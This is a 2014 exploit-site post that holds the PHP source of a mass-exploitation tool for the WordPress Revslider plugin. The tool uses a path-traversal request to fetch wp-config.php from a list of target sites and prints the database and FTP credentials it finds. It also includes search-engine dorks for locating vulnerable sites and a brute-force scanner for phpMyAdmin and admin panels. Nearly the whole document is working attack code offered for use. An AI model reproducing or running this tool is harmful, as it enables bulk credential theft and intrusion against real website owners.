facebook facebook twitter rss

Mass Revslider Plugin Exploiting v1

Author: AMir dZ 52 , Published: 22-09-2014
<?
echo"
<body bgcolor='#000000' text='white'>
<title>Mass Revslider Exl0it1ng</title>
<style>
body,table{background: black; }
A:link {text-decoration: none;color: red;}
A:active {text-decoration: none;color: red;}
A:visited {text-decoration: none;color: red;}
A:hover {text-decoration: underline; color: red;}
#new,input,textarea,table,td,tr,#gg
{
border-style:solid;
text-decoration:bold;
}
input:hover,tr:hover,td:hover,textarea:hover
{
background-color: #FFFFCC;
color:green;
size:10px;
}
</style>
<center><img src='https://encrypted-tbn2.gstatic.com/images?q=tbn:ANd9GcSjfAs7Cqc8Gq6GTxefRk9Tt0gcWFS2B1kIgYFBs8H24UuC3UYMoA' height='150' width='150'></img><br>
<!--- Menu -----!--->
<p align='center' dir='ltr'>
<font face='Verdana' size='2' color='#FFFFFF'>#
<a href='?dz=scan' style='text-decoration: none'><font color='#006699'>IP Scanner</font></a> ~
<a href='?dz=exp' style='text-decoration: none'><font color='#006699'>Exploiter</font></a> ~ </font>
<font face='Verdana' size='2' color='#006699'>
<a href='?dz=db' style='text-decoration: none'><font color='#006699'>Find DB Panel</font></a><font face='Verdana' size='2' color='#FFFFFF'> ~ </font>
<font face='Verdana' size='2' color='#006699'>
<a href='?dz=dorks' style='text-decoration: none'><font color='#006699'>Exploit Dorks</font></a></font>



<font face='Verdana' size='2' color='#FFFFFF'> ~ </font>
<font face='Verdana' size='2' color='#006699'>
<a href='?dz=toip' style='text-decoration: none'><font color='#006699'>Domains 2 IP</font></a></font>



<font face='Verdana' size='2' color='#FFFFFF'> # </font>
<br><br>
";


/////////////////////////////////
if ($_GET['dz'] == 'exp') {
echo"<form method='post'>
<textarea name='sites' cols='50' rows='12'></textarea><br>
<input type='submit' name='go' value='Exploit'>
</form>";
function findit($mytext,$starttag,$endtag) {
$posLeft = stripos($mytext,$starttag)+strlen($starttag);
$posRight = stripos($mytext,$endtag,$posLeft+1);
return substr($mytext,$posLeft,$posRight-$posLeft);
}
error_reporting(0);
set_time_limit(0);
$ya=$_POST['go'];
$co=$_POST['sites'];

if($ya){
$e=explode("\r\n",$co);
foreach($e as $bda){
//echo '<br>'.$bda;
/// you can devlope the tool ///
$linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
$dn=($bda).($linkof);
$file=@file_get_contents($dn);
if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
echo"<center><font color=green face=Verdana size=-2>Infected ! </font></center>";
echo "<center><font face=Verdana size=-2 color='#00BFFF' >".$bda."</font></center>";
echo "<font face=Verdana size=-2 color=lime >DB name : </font>".findit($file,"DB_NAME', '","');")."<br>";
echo "<font face=Verdana size=-2 color=lime >DB user : </font>".findit($file,"DB_USER', '","');")."<br>";
echo "<font face=Verdana size=-2 color=lime >DB pass : </font>".findit($file,"DB_PASSWORD', '","');")."<br>";
echo "<font face=Verdana size=-2 color=lime >DB host : </font>".findit($file,"DB_HOST', '","');")."<br>";
}
elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
echo'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';
echo"<center><font color=green face=Verdana size=-2>Infected ! </font></center>";
echo "<center><font face=Verdana size=-2 color='#00BFFF' >".$bda."</font></center>";
echo "<font face=Verdana size=-2 color=lime >FTP user : </font>".findit($file,"FTP_USER','","');")."<br>";
echo "<font face=Verdana size=-2 color=lime >FTP pass : </font>".findit($file,"FTP_PASS','","');")."<br>";
echo "<font face=Verdana size=-2 color=lime >FTP host : </font>".findit($file,"FTP_HOST','","');")."<br>";
}
else{
echo'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';
echo "<center><font color=yellow face=Verdana size=-2>".$bda."</font><font color=white face=Verdana size=-2> ==> </font><font color=red face=Verdana size=-2>Not Infected ! </font></center>";}
echo'<center><font color=silver face=Verdana size=2>----------------------------------------------</font></center>';
}

}
}
/////////////////////////////////////

/////////////////////////////////////
if ($_GET['dz'] == 'dorks') {
echo'<br><textarea cols=50 rows=12 >
inurl:wp-content/plugins/revslider/
inurl:revslider
inurl:revslider_admin.php
inurl:revslider_front.php
inurl:plugins/revslider/
intext:Powered by Revslider
intitle:"Index Of/ revslider"
intitle:"Index Of/wp-content/themes/revslider"
intitle:"Index Of/wp-content/plugins/revslider"
intitle:"Index Of/admin/revslider"
intitle:"Index Of/fr/revslider"
intitle:"Index Of/en/revslider"
intitle:"Index Of/us/revslider"
intitle:"Index Of/ar/revslider"
intitle:"Index Of/es/revslider"
intitle:"Index Of/de/revslider"
</textarea>';

}
//////////////////////////////////////

//////////////////////////////////////
if ($_GET['dz'] == 'toip') {
echo"
<form method='post' ><center>
<textarea cols='50' rows='12' name='site2ip' >www.example.com
Please Romove http:// or https://</textarea></br><br>
<input type='submit' name='w2ip' value='Extract' ><br>
</center>";
if(isset($_POST['site2ip'])){
foreach(explode("\n",$_POST['site2ip']) as $site4ip){
$ipp=trim($site4ip);
echo '<font color="red" size="3"></font><font color="green" size="5"><center>
<font color="Blue" size="3"</font><font color=Green face=Verdana size=-2>'.$ipp.'</font>
<font color=white face=Verdana size=-2> ==> </font> <font color=Green face=Verdana size=-2>'.gethostbyname ($ipp).'</font></center></font>';
}
}
}
////////////////////////////////////

////////////////////////////////////
if ($_GET['dz'] == 'db') {


echo'
<form action ="" method="post">
<font face=Verdana size=-2 color=wgite >URL : <input type ="text" name="site"/>
<input type = "submit" value="Find" />
</form>';
$site = $_POST['site'];
$list = array(
'/phpMyAdmin/',
'/phpmyadmin/',
'/PMA/',
'/pma/',
'/admin/',
'/dbadmin/',
'/DB_ADMIN/',
'/db_admin/',
'/DBA/',
'/SQLI/',
'/dba/',
'/sqli/',
'/mysql/',
'/myadmin/',
'/phpmyadmin2/',
'/phpMyAdmin2/',
'/phpMyAdmin-2/',
'/php-my-admin/',
'/phpMyAdmin-2.2.3/',
'/phpMyAdmin-2.2.6/',
'/phpMyAdmin-2.5.1/',
'/phpMyAdmin-2.5.4/',
'/phpMyAdmin-2.5.5-rc1/',
'/phpMyAdmin-2.5.5-rc2/',
'/phpMyAdmin-2.5.5/',
'/phpMyAdmin-2.5.5-pl1/',
'/phpMyAdmin-2.5.6-rc1/',
'/phpMyAdmin-2.5.6-rc2/',
'/phpMyAdmin-2.5.6/',
'/phpMyAdmin-2.5.7/',
'/phpMyAdmin-2.5.7-pl1/',
'/phpMyAdmin-2.6.0-alpha/',
'/phpMyAdmin-2.6.0-alpha2/',
'/phpMyAdmin-2.6.0-beta1/',
'/phpMyAdmin-2.6.0-beta2/',
'/phpMyAdmin-2.6.0-rc1/',
'/phpMyAdmin-2.6.0-rc2/',
'/phpMyAdmin-2.6.0-rc3/',
'/phpMyAdmin-2.6.0/',
'/phpMyAdmin-2.6.0-pl1/',
'/phpMyAdmin-2.6.0-pl2/',
'/phpMyAdmin-2.6.0-pl3/',
'/phpMyAdmin-2.6.1-rc1/',
'/phpMyAdmin-2.6.1-rc2/',
'/phpMyAdmin-2.6.1/',
'/phpMyAdmin-2.6.1-pl1/',
'/phpMyAdmin-2.6.1-pl2/',
'/phpMyAdmin-2.6.1-pl3/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2-beta1/',
'/phpMyAdmin-2.6.2-rc1/',
'/phpMyAdmin-2.6.2/',
'/phpMyAdmin-2.6.2-pl1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-rc1/',
'/phpMyAdmin-2.6.3/',
'/phpMyAdmin-2.6.3-pl1/',
'/phpMyAdmin-2.6.4-rc1/',
'/phpMyAdmin-2.6.4-pl1/',
'/phpMyAdmin-2.6.4-pl2/',
'/phpMyAdmin-2.6.4-pl3/',
'/phpMyAdmin-2.6.4-pl4/',
'/phpMyAdmin-2.6.4/',
'/phpMyAdmin-2.7.0-beta1/',
'/phpMyAdmin-2.7.0-rc1/',
'/phpMyAdmin-2.7.0-pl1/',
'/phpMyAdmin-2.7.0-pl2/',
'/phpMyAdmin-2.7.0/',
'/phpMyAdmin-2.8.0-beta1/',
'/phpMyAdmin-2.8.0-rc1/',
'/phpMyAdmin-2.8.0-rc2/',
'/phpMyAdmin-2.8.0/',
'/phpMyAdmin-2.8.0.1/',
'/phpMyAdmin-2.8.0.2/',
'/phpMyAdmin-2.8.0.3/',
'/phpMyAdmin-2.8.0.4/',
'/phpMyAdmin-2.8.1-rc1/',
'/phpMyAdmin-2.8.1/',
'/phpMyAdmin-2.8.2/',
'/sqlmanager/',
'/mysqlmanager/',
'/p/m/a/',
'/PMA2005/',
'/pma2005/',
'/dev/',
'/phpmanager/',
'/php-myadmin/',
'/phpmy-admin/',
'/webadmin/',
'/sqlweb/',
'/websql/',
'/webdb/',
'/mysqladmin/',
'/mysql-admin/',
'/mya/',
'/PhpMyAdmin/',
'/phpmyadmin/',
'/myadmin/',
'/mysql/',
'/sql/',
'/server/',
'/db/',
'/database/',
'/databases/',
'/adm/',
'/configuration/',
'/configure/',
'/administrator/',
'/login/',
'/moderator/',
'/controlpanel/',
'/adminpanel/',
'/admincontrol/',
'/fileadmin/',
'/data/',
'/postgresql/',
'/oracle/',
'/msssql/',
'/msaccess/',
'/sysadmin/',
'/serverdata/',
'/webadmin/',
'/admins/',
'/Database_Administration/',
'/WebAdmin/',
'/useradmin/',
'/sysadmins/',
'/admin1/',
'/system-administration/',
'/administrators/',
'/pgadmin/',
'/directadmin/',
'/staradmin/',
'/ServerAdministrator/',
'/SysAdmin/',
'/administer/',
'/LiveUser_Admin/',
'/sys-admin/',
'/typo3/',
'/panel/',
'/xlogin/',
'/smblogin/',
'/phpldapadmin/',
'/server_admin/',
'/database_administration/',
'/system_administration/',
'/ss_vms_admin_sm/',
'/adminarea/',
'/MySQL/',
'/mysql_admin/',
'/server_data/',
'/DB/',
'/DB1/',
'/DB2/',
'/DB3/',
'/DB4/',
'/DB5/',
'/DB6/',
'/DB7/',
'/DB8/',
'/DB9/',
'/DB0/',
'/db1/',
'/db2/',
'/db3/',
'/db4/',
'/db5/',
'/db6/',
'/db7/',
'/db8/',
'/db9/',
'/db0/',
'/mysql5/',
'/mysql4/',
'/root/',
'/apache/',
'/php/',
'/Apache/',
'/Php/',
'/apach/',
'/apachepanel/',
'/WEBSERVERS/',
'/DATABASE1/',
'/DATABASE2/',
'/DATABASE3/',
'/DATABASE4/',
'/DATABASE5/',
'/DATABASE6/',
'/DATABASE7/',
'/DATABASE8/',
'/DATABASE9/',
'/WEBDATA/',
'/WEB_DATA/',
'/webservers/',
'/database1/',
'/database2/',
'/database3/',
'/database4/',
'/database5/',
'/database6/',
'/database7/',
'/database8/',
'/database9/',
'/webdata/',
'/web_data/',
);

if(isset($site)){

foreach($list as $path => $test) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_URL, $site.$test);
$result = curl_exec($ch);
curl_close($ch);
//print $url;
if (preg_match("/200 OK/", $result)){
echo "<b><font face=Verdana size=-2 color=green >[+]</font><font face=Verdana size=-2 color=silver > Found ==> </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font></b>";
}
else if (preg_match("/401 Unauthorized/", $result)) {
echo "<b><font face=Verdana size=-2 color=yellow >[!]</font><font face=Verdana size=-2 color=silver > Found ==> </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font><a>[ $site$test ]</A></font></b>";
echo "<b><font face=Verdana size=-2 color=red >[-]</font><font face=Verdana size=-2 color=silver > Nothing found on </font><font face=Verdana size=-2 color=orange ><a>[ $site$test ]</A></font><a>[$site$test]</a></font>";
}
}
echo "<br><b><u><font face=Verdana size=-2 color=#513912 >Scan Finished !</font></u></b>";
}


}
////////////////////////////////////





if ($_GET['dz'] == 'scan') {

echo "<br><b><u><font face=Verdana size=-2 color=#513912 >You can Devlope the Wp IP Scanner or start you idea here and send to <a href=http://dz-amir@hotmail.com >dz-amir@hotmail.com </a> ....</font></u></b>";
}




?>



<center>
<code style="position:fixed; left:0px; right:0px; bottom:0px; background:transparent); text-align:center; border-top: 0px solid #FF3300; border-bottom: 1px solid #FF3300">
<font color=#FF3300 size=1 face="Tahoma">Mass Revslider Plugin Exl0it1ng v1<font><font color=white size=1 face="Tahoma"> -</font><font color=gren size=1 face="Tahoma"> By AMir dZ 52</font></code>
</center>

Like us on Facebook :